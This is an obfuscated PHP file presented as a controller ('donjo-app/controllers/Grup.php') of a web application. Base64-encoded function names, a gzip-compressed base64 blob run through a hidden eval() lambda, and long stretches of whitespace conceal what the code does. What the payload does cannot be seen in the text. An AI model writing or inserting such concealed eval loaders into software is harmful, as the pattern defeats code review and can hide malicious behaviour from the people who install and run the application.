<?php 
        $__='printf';$_='Loading donjo-app/controllers/Grup.php';
        



























































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































































































                                                                                                                                                                                                                     $________;
